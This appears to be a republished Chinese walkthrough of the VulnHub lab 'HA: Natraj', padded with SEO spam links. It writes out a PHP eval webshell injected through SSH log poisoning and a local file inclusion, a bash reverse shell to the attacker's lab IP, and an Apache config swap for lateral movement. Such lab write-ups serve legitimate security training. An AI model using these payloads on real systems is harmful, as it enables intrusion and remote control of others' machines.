当前位置: 首页 > wzjs >正文

用哪个做网站demo吉林做网站哪家好

用哪个做网站demo,吉林做网站哪家好,优秀平面广告设计赏析,网站树状栏目有点HA: Natraj 来自 <HA: Natraj ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.239 3&#xff0c;对靶机进行端口服务…

HA: Natraj

来自 <HA: Natraj ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.239

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.239

访问80端口开放的http服务

4,扫描网站存在哪些子目录

dirsearch -u http://192.168.23.239 -x 403,404

http://192.168.23.239/console/

尝试这个网页存不存在文件包含漏洞 http://192.168.23.239/console/file.php

5,ffuf爆破url参数(FUZZ为需要暴力破解的参数名的占位字符串)

ffuf -u 'http://192.168.23.239/console/file.php?FUZZ=../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0

成功得到了一个参数file,成功验证存在文件包含漏洞

http://192.168.23.239/console/file.php?file=../../../../etc/passwd

但是不是远程文件包含漏洞

6,能够通过文件包含访问到ssh用户登录日志

http://192.168.23.239/console/file.php?file=../../../../var/log/auth.log

尝试故意登录错误,看日志会不会记录错误登录信息

ssh natraj@192.168.23.239

果然更新了错误登录信息,那么我就可以在ssh登录的时候将用户名替换成一句话木马进行恶意登录,也就是将错误日志写入了木马字符串(此时只能算字符串而不是PHP代码),然后通过本地文件包含漏洞包含/var/log/auth.log,使这个文件包含的网页变成木马网页

<?php @eval($_POST['vul']);?>

http://192.168.23.239/console/file.php?file=/var/log/auth.log

因为这里一句话木马被当成PHP代码执行了,所以不会显示出来

密码vul,使用蚁剑连接成功

在蚁剑当中反弹shell来达到迁移shell的目的

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

与此同时kali需要打开终端接收shell

nc -lvvp 4444

由此成功getshell

7,然后看看操作系统和内核的版本

uname -a

lsb_release -a

发现了一个用户mahakal,尝试横向移动到其他用户

8,针对文件权限继续信息收集,查找可利用的点

find / -user root -perm -4000 -print 2>/dev/null    //查找suid

find / -perm -4000 2>dev/null | xargs ls -la     //查找suid并详细展示

find / -writable -type d 2>/dev/null          //查找当前权限可写的路径

find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null       //查找777文件

find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root     //查找写权限文件

查看一下这个文件的内容

cat /etc/apache2/apache2.conf

  1. User ${APACHE_RUN_USER}
    表示 Apache 启动后,其子进程将以 APACHE_RUN_USER 环境变量所指定的用户身份运行。
  2. Group ${APACHE_RUN_GROUP}
    表示 Apache 子进程运行时会加入的用户组。

所以修改这两个就能够使反弹shell的用户变成其他高权限的用户,例如mahakal。修改命令如下:

export APACHE_RUN_USER=mahakal

export APACHE_RUN_GROUP=mahakal

9,需要换一种修改方法,那就是先复制靶场的/etc/apache2/apache2.conf文件到攻击机,然后修改对应内容,然后再把修改之后的文件上传到靶场,然后覆盖原来的/etc/apache2/apache2.conf

vim apache2.conf

python -m http.server

cd /tmp

wget http://192.168.23.182:8000/apache2.conf

cp /tmp/apache2.conf /etc/apache2/apache2.conf

修改成功重启靶机再次尝试使用蚁剑执行命令反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

reboot

nc -lvvp 4444

横向移动成功

10,查看如何提权,先看sudo和suid提权

nmap允许使用sudo命令以root用户执行

成功提权成为root用户,而后获得flag

http://www.dtcms.com/wzjs/592867.html

相关文章:

  • 外汇交易平台网站建设营销型网站建设域名是
  • 建新建设集团有限公司网站刚做的网站搜索不到
  • 网站制作报价维持地建网络智慧团建登录入口官方网站
  • 可视化响应式网站建设网站开发协议书由谁来写
  • 腾讯云电商网站建设网络推广商城网站
  • 模板网站的优缺点企业品牌推广策略
  • 网站被k文章修改网站开发用电脑配置
  • 网站类网站开发源代码做网站移动端建多大尺寸
  • 三水区建设局网站wordpress管理员头像不显示
  • 哪里有网站建设流程wordpress修改默认域名
  • 大型门户网站是这样炼成的源代码常用的网站类型有哪些类型有哪些
  • 网站设计主流尺寸天元建设集团有限公司企查查
  • 国外做电商平台的网站有什么所有网站的分辨率
  • 银川建网站毛概课程网站建设
  • 福田区住房和建设局地址官方网站网站建设方案书阿里云模板
  • 做暧暧免费网站哪些园林网站可以做外链
  • 从网上怎么做网站营销新商盟网站开发时间
  • 成品源码1688网站免费企业网站开发
  • 做网站 编程语言wordpress域名重定义
  • 专业的门户网站建设方案建10个网站
  • 做企业网站专用词wordpress foxplayer
  • 网站建设 会计科目网站技术开发文档模板
  • 小榄做网站企业网站开发主要包括哪些方面
  • 家如何网站玉溪网站开发
  • 建设网站必备条件学校部门网站建设
  • 个人建网站学做文案的网站
  • 做单页免费模板网站织梦网站如何备份教程
  • c 网站开发视频教程 高清顺德做网站推广哪家好
  • 西安网站关键词排名搭建一个网站的具体步骤
  • 网站源码提取盐城网站优化